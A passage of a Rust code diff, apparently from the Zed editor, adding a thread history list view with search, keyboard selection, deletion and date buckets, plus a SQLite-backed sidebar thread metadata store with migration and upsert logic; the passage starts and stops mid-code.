+ fn search_produced_no_matches(&self) -> bool {
+ self.visible_items.is_empty() && !self.search_query.is_empty()
+ }
+
+ fn selected_history_entry(&self) -> Option<&AgentSessionInfo> {
+ self.get_history_entry(self.selected_index)
+ }
+
+ fn get_history_entry(&self, visible_items_ix: usize) -> Option<&AgentSessionInfo> {
+ self.visible_items.get(visible_items_ix)?.history_entry()
+ }
+
+ fn set_selected_index(&mut self, mut index: usize, bias: Bias, cx: &mut Context<Self>) {
+ if self.visible_items.len() == 0 {
+ self.selected_index = 0;
+ return;
+ }
+ while matches!(
+ self.visible_items.get(index),
+ None | Some(ListItemType::BucketSeparator(..))
+ ) {
+ index = match bias {
+ Bias::Left => {
+ if index == 0 {
+ self.visible_items.len() - 1
+ } else {
+ index - 1
+ }
+ }
+ Bias::Right => {
+ if index >= self.visible_items.len() - 1 {
+ 0
+ } else {
+ index + 1
+ }
+ }
+ };
+ }
+ self.selected_index = index;
+ self.scroll_handle
+ .scroll_to_item(index, ScrollStrategy::Top);
+ cx.notify()
+ }
+
+ fn select_previous(
+ &mut self,
+ _: &menu::SelectPrevious,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ if self.selected_index == 0 {
+ self.set_selected_index(self.visible_items.len() - 1, Bias::Left, cx);
+ } else {
+ self.set_selected_index(self.selected_index - 1, Bias::Left, cx);
+ }
+ }
+
+ fn select_next(&mut self, _: &menu::SelectNext, _window: &mut Window, cx: &mut Context<Self>) {
+ if self.selected_index == self.visible_items.len() - 1 {
+ self.set_selected_index(0, Bias::Right, cx);
+ } else {
+ self.set_selected_index(self.selected_index + 1, Bias::Right, cx);
+ }
+ }
+
+ fn select_first(
+ &mut self,
+ _: &menu::SelectFirst,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.set_selected_index(0, Bias::Right, cx);
+ }
+
+ fn select_last(&mut self, _: &menu::SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
+ self.set_selected_index(self.visible_items.len() - 1, Bias::Left, cx);
+ }
+
+ fn confirm(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context<Self>) {
+ self.confirm_entry(self.selected_index, cx);
+ }
+
+ fn confirm_entry(&mut self, ix: usize, cx: &mut Context<Self>) {
+ let Some(entry) = self.get_history_entry(ix) else {
+ return;
+ };
+ cx.emit(ThreadHistoryViewEvent::Open(entry.clone()));
+ }
+
+ fn remove_selected_thread(
+ &mut self,
+ _: &RemoveSelectedThread,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.remove_thread(self.selected_index, cx)
+ }
+
+ fn remove_thread(&mut self, visible_item_ix: usize, cx: &mut Context<Self>) {
+ let Some(entry) = self.get_history_entry(visible_item_ix) else {
+ return;
+ };
+ if !self.history.read(cx).supports_delete() {
+ return;
+ }
+ let session_id = entry.session_id.clone();
+ self.history.update(cx, |history, cx| {
+ history
+ .delete_session(&session_id, cx)
+ .detach_and_log_err(cx);
+ });
+ }
+
+ fn remove_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
+ if !self.history.read(cx).supports_delete() {
+ return;
+ }
+ self.history.update(cx, |history, cx| {
+ history.delete_sessions(cx).detach_and_log_err(cx);
+ });
+ self.confirming_delete_history = false;
+ cx.notify();
+ }
+
+ fn prompt_delete_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
+ self.confirming_delete_history = true;
+ cx.notify();
+ }
+
+ fn cancel_delete_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
+ self.confirming_delete_history = false;
+ cx.notify();
+ }
+
+ fn render_list_items(
+ &mut self,
+ range: Range<usize>,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Vec<AnyElement> {
+ self.visible_items
+ .get(range.clone())
+ .into_iter()
+ .flatten()
+ .enumerate()
+ .map(|(ix, item)| self.render_list_item(item, range.start + ix, cx))
+ .collect()
+ }
+
+ fn render_list_item(&self, item: &ListItemType, ix: usize, cx: &Context<Self>) -> AnyElement {
+ match item {
+ ListItemType::Entry { entry, format } => self
+ .render_history_entry(entry, *format, ix, Vec::default(), cx)
+ .into_any(),
+ ListItemType::SearchResult { entry, positions } => self.render_history_entry(
+ entry,
+ EntryTimeFormat::DateAndTime,
+ ix,
+ positions.clone(),
+ cx,
+ ),
+ ListItemType::BucketSeparator(bucket) => div()
+ .px(DynamicSpacing::Base06.rems(cx))
+ .pt_2()
+ .pb_1()
+ .child(
+ Label::new(bucket.to_string())
+ .size(LabelSize::XSmall)
+ .color(Color::Muted),
+ )
+ .into_any_element(),
+ }
+ }
+
+ fn render_history_entry(
+ &self,
+ entry: &AgentSessionInfo,
+ format: EntryTimeFormat,
+ ix: usize,
+ highlight_positions: Vec<usize>,
+ cx: &Context<Self>,
+ ) -> AnyElement {
+ let selected = ix == self.selected_index;
+ let hovered = Some(ix) == self.hovered_index;
+ let entry_time = entry.updated_at;
+ let display_text = match (format, entry_time) {
+ (EntryTimeFormat::DateAndTime, Some(entry_time)) => {
+ let now = Utc::now();
+ let duration = now.signed_duration_since(entry_time);
+ let days = duration.num_days();
+
+ format!("{}d", days)
+ }
+ (EntryTimeFormat::TimeOnly, Some(entry_time)) => {
+ format.format_timestamp(entry_time.timestamp(), self.local_timezone)
+ }
+ (_, None) => "—".to_string(),
+ };
+
+ let title = thread_title(entry);
+ let full_date = entry_time
+ .map(|time| {
+ EntryTimeFormat::DateAndTime.format_timestamp(time.timestamp(), self.local_timezone)
+ })
+ .unwrap_or_else(|| "Unknown".to_string());
+
+ let supports_delete = self.history.read(cx).supports_delete();
+
+ h_flex()
+ .w_full()
+ .pb_1()
+ .child(
+ ListItem::new(ix)
+ .rounded()
+ .toggle_state(selected)
+ .spacing(ListItemSpacing::Sparse)
+ .start_slot(
+ h_flex()
+ .w_full()
+ .gap_2()
+ .justify_between()
+ .child(
+ HighlightedLabel::new(thread_title(entry), highlight_positions)
+ .size(LabelSize::Small)
+ .truncate(),
+ )
+ .child(
+ Label::new(display_text)
+ .color(Color::Muted)
+ .size(LabelSize::XSmall),
+ ),
+ )
+ .tooltip(move |_, cx| {
+ Tooltip::with_meta(title.clone(), None, full_date.clone(), cx)
+ })
+ .on_hover(cx.listener(move |this, is_hovered, _window, cx| {
+ if *is_hovered {
+ this.hovered_index = Some(ix);
+ } else if this.hovered_index == Some(ix) {
+ this.hovered_index = None;
+ }
+
+ cx.notify();
+ }))
+ .end_slot::<IconButton>(if hovered && supports_delete {
+ Some(
+ IconButton::new("delete", IconName::Trash)
+ .shape(IconButtonShape::Square)
+ .icon_size(IconSize::XSmall)
+ .icon_color(Color::Muted)
+ .tooltip(move |_window, cx| {
+ Tooltip::for_action("Delete", &RemoveSelectedThread, cx)
+ })
+ .on_click(cx.listener(move |this, _, _, cx| {
+ this.remove_thread(ix, cx);
+ cx.stop_propagation()
+ })),
+ )
+ } else {
+ None
+ })
+ .on_click(cx.listener(move |this, _, _, cx| this.confirm_entry(ix, cx))),
+ )
+ .into_any_element()
+ }
+}
+
+impl Focusable for ThreadHistoryView {
+ fn focus_handle(&self, cx: &App) -> FocusHandle {
+ self.search_editor.focus_handle(cx)
+ }
+}
+
+impl Render for ThreadHistoryView {
+ fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let has_no_history = self.history.read(cx).is_empty();
+ let supports_delete = self.history.read(cx).supports_delete();
+
+ v_flex()
+ .key_context("ThreadHistory")
+ .size_full()
+ .bg(cx.theme().colors().panel_background)
+ .on_action(cx.listener(Self::select_previous))
+ .on_action(cx.listener(Self::select_next))
+ .on_action(cx.listener(Self::select_first))
+ .on_action(cx.listener(Self::select_last))
+ .on_action(cx.listener(Self::confirm))
+ .on_action(cx.listener(Self::remove_selected_thread))
+ .on_action(cx.listener(|this, _: &RemoveHistory, window, cx| {
+ this.remove_history(window, cx);
+ }))
+ .child(
+ h_flex()
+ .h(Tab::container_height(cx))
+ .w_full()
+ .py_1()
+ .px_2()
+ .gap_2()
+ .justify_between()
+ .border_b_1()
+ .border_color(cx.theme().colors().border)
+ .child(
+ Icon::new(IconName::MagnifyingGlass)
+ .color(Color::Muted)
+ .size(IconSize::Small),
+ )
+ .child(self.search_editor.clone()),
+ )
+ .child({
+ let view = v_flex()
+ .id("list-container")
+ .relative()
+ .overflow_hidden()
+ .flex_grow();
+
+ if has_no_history {
+ view.justify_center().items_center().child(
+ Label::new("You don't have any past threads yet.")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ } else if self.search_produced_no_matches() {
+ view.justify_center()
+ .items_center()
+ .child(Label::new("No threads match your search.").size(LabelSize::Small))
+ } else {
+ view.child(
+ uniform_list(
+ "thread-history",
+ self.visible_items.len(),
+ cx.processor(|this, range: Range<usize>, window, cx| {
+ this.render_list_items(range, window, cx)
+ }),
+ )
+ .p_1()
+ .pr_4()
+ .track_scroll(&self.scroll_handle)
+ .flex_grow(),
+ )
+ .vertical_scrollbar_for(&self.scroll_handle, window, cx)
+ }
+ })
+ .when(!has_no_history && supports_delete, |this| {
+ this.child(
+ h_flex()
+ .p_2()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ .when(!self.confirming_delete_history, |this| {
+ this.child(
+ Button::new("delete_history", "Delete All History")
+ .full_width()
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.prompt_delete_history(window, cx);
+ })),
+ )
+ })
+ .when(self.confirming_delete_history, |this| {
+ this.w_full()
+ .gap_2()
+ .flex_wrap()
+ .justify_between()
+ .child(
+ h_flex()
+ .flex_wrap()
+ .gap_1()
+ .child(
+ Label::new("Delete all threads?")
+ .size(LabelSize::Small),
+ )
+ .child(
+ Label::new("You won't be able to recover them later.")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .child(
+ h_flex()
+ .gap_1()
+ .child(
+ Button::new("cancel_delete", "Cancel")
+ .label_size(LabelSize::Small)
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.cancel_delete_history(window, cx);
+ })),
+ )
+ .child(
+ Button::new("confirm_delete", "Delete")
+ .style(ButtonStyle::Tinted(ui::TintColor::Error))
+ .color(Color::Error)
+ .label_size(LabelSize::Small)
+ .on_click(cx.listener(|_, _, window, cx| {
+ window.dispatch_action(
+ Box::new(RemoveHistory),
+ cx,
+ );
+ })),
+ ),
+ )
+ }),
+ )
+ })
+ }
+}
+
+#[derive(IntoElement)]
+pub struct HistoryEntryElement {
+ entry: AgentSessionInfo,
+ conversation_view: WeakEntity<ConversationView>,
+ selected: bool,
+ hovered: bool,
+ supports_delete: bool,
+ on_hover: Box<dyn Fn(&bool, &mut Window, &mut App) + 'static>,
+}
+
+impl HistoryEntryElement {
+ pub fn new(entry: AgentSessionInfo, conversation_view: WeakEntity<ConversationView>) -> Self {
+ Self {
+ entry,
+ conversation_view,
+ selected: false,
+ hovered: false,
+ supports_delete: false,
+ on_hover: Box::new(|_, _, _| {}),
+ }
+ }
+
+ pub fn supports_delete(mut self, supports_delete: bool) -> Self {
+ self.supports_delete = supports_delete;
+ self
+ }
+
+ pub fn hovered(mut self, hovered: bool) -> Self {
+ self.hovered = hovered;
+ self
+ }
+
+ pub fn on_hover(mut self, on_hover: impl Fn(&bool, &mut Window, &mut App) + 'static) -> Self {
+ self.on_hover = Box::new(on_hover);
+ self
+ }
+}
+
+impl RenderOnce for HistoryEntryElement {
+ fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
+ let id = ElementId::Name(self.entry.session_id.0.clone().into());
+ let title = thread_title(&self.entry);
+ let formatted_time = self
+ .entry
+ .updated_at
+ .map(|timestamp| {
+ let now = chrono::Utc::now();
+ let duration = now.signed_duration_since(timestamp);
+
+ if duration.num_days() > 0 {
+ format!("{}d", duration.num_days())
+ } else if duration.num_hours() > 0 {
+ format!("{}h ago", duration.num_hours())
+ } else if duration.num_minutes() > 0 {
+ format!("{}m ago", duration.num_minutes())
+ } else {
+ "Just now".to_string()
+ }
+ })
+ .unwrap_or_else(|| "Unknown".to_string());
+
+ ListItem::new(id)
+ .rounded()
+ .toggle_state(self.selected)
+ .spacing(ListItemSpacing::Sparse)
+ .start_slot(
+ h_flex()
+ .w_full()
+ .gap_2()
+ .justify_between()
+ .child(Label::new(title).size(LabelSize::Small).truncate())
+ .child(
+ Label::new(formatted_time)
+ .color(Color::Muted)
+ .size(LabelSize::XSmall),
+ ),
+ )
+ .on_hover(self.on_hover)
+ .end_slot::<IconButton>(if (self.hovered || self.selected) && self.supports_delete {
+ Some(
+ IconButton::new("delete", IconName::Trash)
+ .shape(IconButtonShape::Square)
+ .icon_size(IconSize::XSmall)
+ .icon_color(Color::Muted)
+ .tooltip(move |_window, cx| {
+ Tooltip::for_action("Delete", &RemoveSelectedThread, cx)
+ })
+ .on_click({
+ let conversation_view = self.conversation_view.clone();
+ let session_id = self.entry.session_id.clone();
+
+ move |_event, _window, cx| {
+ if let Some(conversation_view) = conversation_view.upgrade() {
+ conversation_view.update(cx, |conversation_view, cx| {
+ conversation_view.delete_history_entry(&session_id, cx);
+ });
+ }
+ }
+ }),
+ )
+ } else {
+ None
+ })
+ .on_click({
+ let conversation_view = self.conversation_view.clone();
+ let entry = self.entry;
+
+ move |_event, window, cx| {
+ if let Some(workspace) = conversation_view
+ .upgrade()
+ .and_then(|view| view.read(cx).workspace().upgrade())
+ {
+ if let Some(panel) = workspace.read(cx).panel::<AgentPanel>(cx) {
+ panel.update(cx, |panel, cx| {
+ if let Some(agent) = panel.selected_agent() {
+ panel.load_agent_thread(
+ agent,
+ entry.session_id.clone(),
+ entry.work_dirs.clone(),
+ entry.title.clone(),
+ true,
+ window,
+ cx,
+ );
+ }
+ });
+ }
+ }
+ }
+ })
+ }
+}
+
+#[derive(Clone, Copy)]
+pub enum EntryTimeFormat {
+ DateAndTime,
+ TimeOnly,
+}
+
+impl EntryTimeFormat {
+ fn format_timestamp(&self, timestamp: i64, timezone: UtcOffset) -> String {
+ let timestamp = OffsetDateTime::from_unix_timestamp(timestamp).unwrap();
+
+ match self {
+ EntryTimeFormat::DateAndTime => time_format::format_localized_timestamp(
+ timestamp,
+ OffsetDateTime::now_utc(),
+ timezone,
+ time_format::TimestampFormat::EnhancedAbsolute,
+ ),
+ EntryTimeFormat::TimeOnly => time_format::format_time(timestamp.to_offset(timezone)),
+ }
+ }
+}
+
+impl From<TimeBucket> for EntryTimeFormat {
+ fn from(bucket: TimeBucket) -> Self {
+ match bucket {
+ TimeBucket::Today => EntryTimeFormat::TimeOnly,
+ TimeBucket::Yesterday => EntryTimeFormat::TimeOnly,
+ TimeBucket::ThisWeek => EntryTimeFormat::DateAndTime,
+ TimeBucket::PastWeek => EntryTimeFormat::DateAndTime,
+ TimeBucket::All => EntryTimeFormat::DateAndTime,
+ }
+ }
+}
+
+#[derive(PartialEq, Eq, Clone, Copy, Debug)]
+enum TimeBucket {
+ Today,
+ Yesterday,
+ ThisWeek,
+ PastWeek,
+ All,
+}
+
+impl TimeBucket {
+ fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self {
+ if date == reference {
+ return TimeBucket::Today;
+ }
+
+ if date == reference - TimeDelta::days(1) {
+ return TimeBucket::Yesterday;
+ }
+
+ let week = date.iso_week();
+
+ if reference.iso_week() == week {
+ return TimeBucket::ThisWeek;
+ }
+
+ let last_week = (reference - TimeDelta::days(7)).iso_week();
+
+ if week == last_week {
+ return TimeBucket::PastWeek;
+ }
+
+ TimeBucket::All
+ }
+}
+
+impl Display for TimeBucket {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ match self {
+ TimeBucket::Today => write!(f, "Today"),
+ TimeBucket::Yesterday => write!(f, "Yesterday"),
+ TimeBucket::ThisWeek => write!(f, "This Week"),
+ TimeBucket::PastWeek => write!(f, "Past Week"),
+ TimeBucket::All => write!(f, "All"),
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use chrono::NaiveDate;
+
+ #[test]
+ fn test_time_bucket_from_dates() {
+ let today = NaiveDate::from_ymd_opt(2025, 1, 15).unwrap();
+
+ assert_eq!(TimeBucket::from_dates(today, today), TimeBucket::Today);
+
+ let yesterday = NaiveDate::from_ymd_opt(2025, 1, 14).unwrap();
+ assert_eq!(
+ TimeBucket::from_dates(today, yesterday),
+ TimeBucket::Yesterday
+ );
+
+ let this_week = NaiveDate::from_ymd_opt(2025, 1, 13).unwrap();
+ assert_eq!(
+ TimeBucket::from_dates(today, this_week),
+ TimeBucket::ThisWeek
+ );
+
+ let past_week = NaiveDate::from_ymd_opt(2025, 1, 7).unwrap();
+ assert_eq!(
+ TimeBucket::from_dates(today, past_week),
+ TimeBucket::PastWeek
+ );
+
+ let old = NaiveDate::from_ymd_opt(2024, 12, 1).unwrap();
+ assert_eq!(TimeBucket::from_dates(today, old), TimeBucket::All);
+ }
+}
@@ -0,0 +1,1038 @@
+use std::{path::Path, sync::Arc};
+
+use acp_thread::AgentSessionInfo;
+use agent::{ThreadStore, ZED_AGENT_ID};
+use agent_client_protocol as acp;
+use anyhow::{Context as _, Result};
+use chrono::{DateTime, Utc};
+use collections::HashMap;
+use db::{
+ sqlez::{
+ bindable::Column, domain::Domain, statement::Statement,
+ thread_safe_connection::ThreadSafeConnection,
+ },
+ sqlez_macros::sql,
+};
+use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt};
+use futures::{FutureExt as _, future::Shared};
+use gpui::{AppContext as _, Entity, Global, Subscription, Task};
+use project::AgentId;
+use ui::{App, Context, SharedString};
+use util::ResultExt as _;
+use workspace::PathList;
+
+use crate::DEFAULT_THREAD_TITLE;
+
+pub fn init(cx: &mut App) {
+ SidebarThreadMetadataStore::init_global(cx);
+
+ if cx.has_flag::<AgentV2FeatureFlag>() {
+ migrate_thread_metadata(cx);
+ }
+ cx.observe_flag::<AgentV2FeatureFlag, _>(|has_flag, cx| {
+ if has_flag {
+ migrate_thread_metadata(cx);
+ }
+ })
+ .detach();
+}
+
+/// Migrate existing thread metadata from native agent thread store to the new metadata storage.
+/// We migrate the last 10 threads per project and skip threads that do not have a project.
+///
+/// TODO: Remove this after N weeks of shipping the sidebar
+fn migrate_thread_metadata(cx: &mut App) {
+ const MAX_MIGRATED_THREADS_PER_PROJECT: usize = 10;
+
+ let store = SidebarThreadMetadataStore::global(cx);
+ let db = store.read(cx).db.clone();
+
+ cx.spawn(async move |cx| {
+ if !db.is_empty()? {
+ return Ok::<(), anyhow::Error>(());
+ }
+
+ let metadata = store.read_with(cx, |_store, app| {
+ let mut migrated_threads_per_project = HashMap::default();
+
+ ThreadStore::global(app)
+ .read(app)
+ .entries()
+ .filter_map(|entry| {
+ if entry.folder_paths.is_empty() {
+ return None;
+ }
+
+ let migrated_thread_count = migrated_threads_per_project
+ .entry(entry.folder_paths.clone())
+ .or_insert(0);
+ if *migrated_thread_count >= MAX_MIGRATED_THREADS_PER_PROJECT {
+ return None;
+ }
+ *migrated_thread_count += 1;
+
+ Some(ThreadMetadata {
+ session_id: entry.id,
+ agent_id: None,
+ title: entry.title,
+ updated_at: entry.updated_at,
+ created_at: entry.created_at,
+ folder_paths: entry.folder_paths,
+ })
+ })
+ .collect::<Vec<_>>()
+ });
+
+ log::info!("Migrating {} thread store entries", metadata.len());
+
+ // Manually save each entry to the database and call reload, otherwise
+ // we'll end up triggering lots of reloads after each save
+ for entry in metadata {
+ db.save(entry).await?;
+ }
+
+ log::info!("Finished migrating thread store entries");
+
+ let _ = store.update(cx, |store, cx| store.reload(cx));
+ Ok(())
+ })
+ .detach_and_log_err(cx);
+}
+
+struct GlobalThreadMetadataStore(Entity<SidebarThreadMetadataStore>);
+impl Global for GlobalThreadMetadataStore {}
+
+/// Lightweight metadata for any thread (native or ACP), enough to populate
+/// the sidebar list and route to the correct load path when clicked.
+#[derive(Debug, Clone)]
+pub struct ThreadMetadata {
+ pub session_id: acp::SessionId,
+ /// `None` for native Zed threads, `Some("claude-code")` etc. for ACP agents.
+ pub agent_id: Option<AgentId>,
+ pub title: SharedString,
+ pub updated_at: DateTime<Utc>,
+ pub created_at: Option<DateTime<Utc>>,
+ pub folder_paths: PathList,
+}
+
+impl ThreadMetadata {
+ pub fn from_session_info(agent_id: AgentId, session: &AgentSessionInfo) -> Self {
+ let session_id = session.session_id.clone();
+ let title = session.title.clone().unwrap_or_default();
+ let updated_at = session.updated_at.unwrap_or_else(|| Utc::now());
+ let created_at = session.created_at.unwrap_or(updated_at);
+ let folder_paths = session.work_dirs.clone().unwrap_or_default();
+ let agent_id = if agent_id.as_ref() == ZED_AGENT_ID.as_ref() {
+ None
+ } else {
+ Some(agent_id)
+ };
+ Self {
+ session_id,
+ agent_id,
+ title,
+ updated_at,
+ created_at: Some(created_at),
+ folder_paths,
+ }
+ }
+
+ pub fn from_thread(thread: &Entity<acp_thread::AcpThread>, cx: &App) -> Self {
+ let thread_ref = thread.read(cx);
+ let session_id = thread_ref.session_id().clone();
+ let title = thread_ref
+ .title()
+ .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into());
+ let updated_at = Utc::now();
+
+ let agent_id = thread_ref.connection().agent_id();
+
+ let agent_id = if agent_id.as_ref() == ZED_AGENT_ID.as_ref() {
+ None
+ } else {
+ Some(agent_id)
+ };
+
+ let folder_paths = {
+ let project = thread_ref.project().read(cx);
+ let paths: Vec<Arc<Path>> = project
+ .visible_worktrees(cx)
+ .map(|worktree| worktree.read(cx).abs_path())
+ .collect();
+ PathList::new(&paths)
+ };
+
+ Self {
+ session_id,
+ agent_id,
+ title,
+ created_at: Some(updated_at), // handled by db `ON CONFLICT`
+ updated_at,
+ folder_paths,
+ }
+ }
+}
+
+/// The store holds all metadata needed to show threads in the sidebar.
+/// Effectively, all threads stored in here are "non-archived".
+///
+/// Automatically listens to AcpThread events and updates metadata if it has changed.
+pub struct SidebarThreadMetadataStore {
+ db: ThreadMetadataDb,
+ threads: Vec<ThreadMetadata>,
+ threads_by_paths: HashMap<PathList, Vec<ThreadMetadata>>,
+ reload_task: Option<Shared<Task<()>>>,
+ session_subscriptions: HashMap<acp::SessionId, Subscription>,
+}
+
+impl SidebarThreadMetadataStore {
+ #[cfg(not(any(test, feature = "test-support")))]
+ pub fn init_global(cx: &mut App) {
+ if cx.has_global::<Self>() {
+ return;
+ }
+
+ let db = ThreadMetadataDb::global(cx);
+ let thread_store = cx.new(|cx| Self::new(db, cx));
+ cx.set_global(GlobalThreadMetadataStore(thread_store));
+ }
+
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn init_global(cx: &mut App) {
+ let thread = std::thread::current();
+ let test_name = thread.name().unwrap_or("unknown_test");
+ let db_name = format!("THREAD_METADATA_DB_{}", test_name);
+ let db = smol::block_on(db::open_test_db::<ThreadMetadataDb>(&db_name));
+ let thread_store = cx.new(|cx| Self::new(ThreadMetadataDb(db), cx));
+ cx.set_global(GlobalThreadMetadataStore(thread_store));
+ }
+
+ pub fn try_global(cx: &App) -> Option<Entity<Self>> {
+ cx.try_global::<GlobalThreadMetadataStore>()
+ .map(|store| store.0.clone())
+ }
+
+ pub fn global(cx: &App) -> Entity<Self> {
+ cx.global::<GlobalThreadMetadataStore>().0.clone()
+ }
+
+ pub fn is_empty(&self) -> bool {
+ self.threads.is_empty()
+ }
+
+ pub fn entries(&self) -> impl Iterator<Item = ThreadMetadata> + '_ {
+ self.threads.iter().cloned()
+ }
+
+ pub fn entry_ids(&self) -> impl Iterator<Item = acp::SessionId> + '_ {
+ self.threads.iter().map(|thread| thread.session_id.clone())
+ }
+
+ pub fn entries_for_path(
+ &self,
+ path_list: &PathList,
+ ) -> impl Iterator<Item = ThreadMetadata> + '_ {
+ self.threads_by_paths
+ .get(path_list)
+ .into_iter()
+ .flatten()
+ .cloned()
+ }
+
+ fn reload(&mut self, cx: &mut Context<Self>) -> Shared<Task<()>> {
+ let db = self.db.clone();
+ self.reload_task.take();
+
+ let list_task = cx
+ .background_spawn(async move { db.list().context("Failed to fetch sidebar metadata") });
+
+ let reload_task = cx
+ .spawn(async move |this, cx| {
+ let Some(rows) = list_task.await.log_err() else {
+ return;
+ };
+
+ this.update(cx, |this, cx| {
+ this.threads.clear();
+ this.threads_by_paths.clear();
+
+ for row in rows {
+ this.threads_by_paths
+ .entry(row.folder_paths.clone())
+ .or_default()
+ .push(row.clone());
+ this.threads.push(row);
+ }
+
+ cx.notify();
+ })
+ .ok();
+ })
+ .shared();
+ self.reload_task = Some(reload_task.clone());
+ reload_task
+ }
+
+ pub fn save(&mut self, metadata: ThreadMetadata, cx: &mut Context<Self>) -> Task<Result<()>> {
+ if !cx.has_flag::<AgentV2FeatureFlag>() {
+ return Task::ready(Ok(()));
+ }
+
+ let db = self.db.clone();
+ cx.spawn(async move |this, cx| {
+ db.save(metadata).await?;
+ let reload_task = this.update(cx, |this, cx| this.reload(cx))?;
+ reload_task.await;
+ Ok(())
+ })
+ }
+
+ pub fn delete(
+ &mut self,
+ session_id: acp::SessionId,
+ cx: &mut Context<Self>,
+ ) -> Task<Result<()>> {
+ if !cx.has_flag::<AgentV2FeatureFlag>() {
+ return Task::ready(Ok(()));
+ }
+
+ let db = self.db.clone();
+ cx.spawn(async move |this, cx| {
+ db.delete(session_id).await?;
+ let reload_task = this.update(cx, |this, cx| this.reload(cx))?;
+ reload_task.await;
+ Ok(())
+ })
+ }
+
+ fn new(db: ThreadMetadataDb, cx: &mut Context<Self>) -> Self {
+ let weak_store = cx.weak_entity();
+
+ cx.observe_new::<acp_thread::AcpThread>(move |thread, _window, cx| {
+ // Don't track subagent threads in the sidebar.
+ if thread.parent_session_id().is_some() {
+ return;
+ }
+
+ let thread_entity = cx.entity();
+
+ cx.on_release({
+ let weak_store = weak_store.clone();
+ move |thread, cx| {
+ weak_store
+ .update(cx, |store, _cx| {
+ store.session_subscriptions.remove(thread.session_id());
+ })
+ .ok();
+ }
+ })
+ .detach();
+
+ weak_store
+ .update(cx, |this, cx| {
+ let subscription = cx.subscribe(&thread_entity, Self::handle_thread_update);
+ this.session_subscriptions
+ .insert(thread.session_id().clone(), subscription);
+ })
+ .ok();
+ })
+ .detach();
+
+ let mut this = Self {
+ db,
+ threads: Vec::new(),
+ threads_by_paths: HashMap::default(),
+ reload_task: None,
+ session_subscriptions: HashMap::default(),
+ };
+ let _ = this.reload(cx);
+ this
+ }
+
+ fn handle_thread_update(
+ &mut self,
+ thread: Entity<acp_thread::AcpThread>,
+ event: &acp_thread::AcpThreadEvent,
+ cx: &mut Context<Self>,
+ ) {
+ // Don't track subagent threads in the sidebar.
+ if thread.read(cx).parent_session_id().is_some() {
+ return;
+ }
+
+ match event {
+ acp_thread::AcpThreadEvent::NewEntry
+ | acp_thread::AcpThreadEvent::TitleUpdated
+ | acp_thread::AcpThreadEvent::EntryUpdated(_)
+ | acp_thread::AcpThreadEvent::EntriesRemoved(_)
+ | acp_thread::AcpThreadEvent::ToolAuthorizationRequested(_)
+ | acp_thread::AcpThreadEvent::ToolAuthorizationReceived(_)
+ | acp_thread::AcpThreadEvent::Retry(_)
+ | acp_thread::AcpThreadEvent::Stopped(_)
+ | acp_thread::AcpThreadEvent::Error
+ | acp_thread::AcpThreadEvent::LoadError(_)
+ | acp_thread::AcpThreadEvent::Refusal => {
+ let metadata = ThreadMetadata::from_thread(&thread, cx);
+ self.save(metadata, cx).detach_and_log_err(cx);
+ }
+ _ => {}
+ }
+ }
+}
+
+impl Global for SidebarThreadMetadataStore {}
+
+struct ThreadMetadataDb(ThreadSafeConnection);
+
+impl Domain for ThreadMetadataDb {
+ const NAME: &str = stringify!(ThreadMetadataDb);
+
+ const MIGRATIONS: &[&str] = &[sql!(
+ CREATE TABLE IF NOT EXISTS sidebar_threads(
+ session_id TEXT PRIMARY KEY,
+ agent_id TEXT,
+ title TEXT NOT NULL,
+ updated_at TEXT NOT NULL,
+ created_at TEXT,
+ folder_paths TEXT,
+ folder_paths_order TEXT
+ ) STRICT;
+ )];
+}
+
+db::static_connection!(ThreadMetadataDb, []);
+
+impl ThreadMetadataDb {
+ pub fn is_empty(&self) -> anyhow::Result<bool> {
+ self.select::<i64>("SELECT COUNT(*) FROM sidebar_threads")?()
+ .map(|counts| counts.into_iter().next().unwrap_or_default() == 0)
+ }
+
+ /// List all sidebar thread metadata, ordered by updated_at descending.
+ pub fn list(&self) -> anyhow::Result<Vec<ThreadMetadata>> {
+ self.select::<ThreadMetadata>(
+ "SELECT session_id, agent_id, title, updated_at, created_at, folder_paths, folder_paths_order \
+ FROM sidebar_threads \
+ ORDER BY updated_at DESC"
+ )?()
+ }
+
+ /// Upsert metadata for a thread.
+ pub async fn save(&self, row: ThreadMetadata) -> anyhow::Result<()> {
+ let id = row.session_id.0.clone();
+ let agent_id = row.agent_id.as_ref().map(|id| id.0.to_string());
+ let title = row.title.to_string();
+ let updated_at = row.updated_at.to_rfc3339();
+ let created_at = row.created_at.map(|dt| dt.to_rfc3339());
+ let serialized = row.folder_paths.serialize();
+ let (folder_paths, folder_paths_order) = if row.folder_paths.is_empty() {
+ (None, None)
+ } else {
+ (Some(serialized.paths), Some(serialized.order))
+ };
+
+ self.write(move |conn| {
+ let sql = "INSERT INTO sidebar_threads(session_id, agent_id, title, updated_at, created_at, folder_paths, folder_paths_order) \
+ VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7) \
+ ON CONFLICT(session_id) DO UPDATE SET \
+ agent_id = excluded.agent_id, \
+ title = excluded.title, \
+ updated_at = excluded.updated_at, \
+ folder_paths = excluded.folder_paths, \
+ folder_paths_order = excluded.folder_paths_order";
+ let mut stmt = Statement::prepare(conn, sql)?;
+ let mut i = stmt.bind(&id, 1)?;
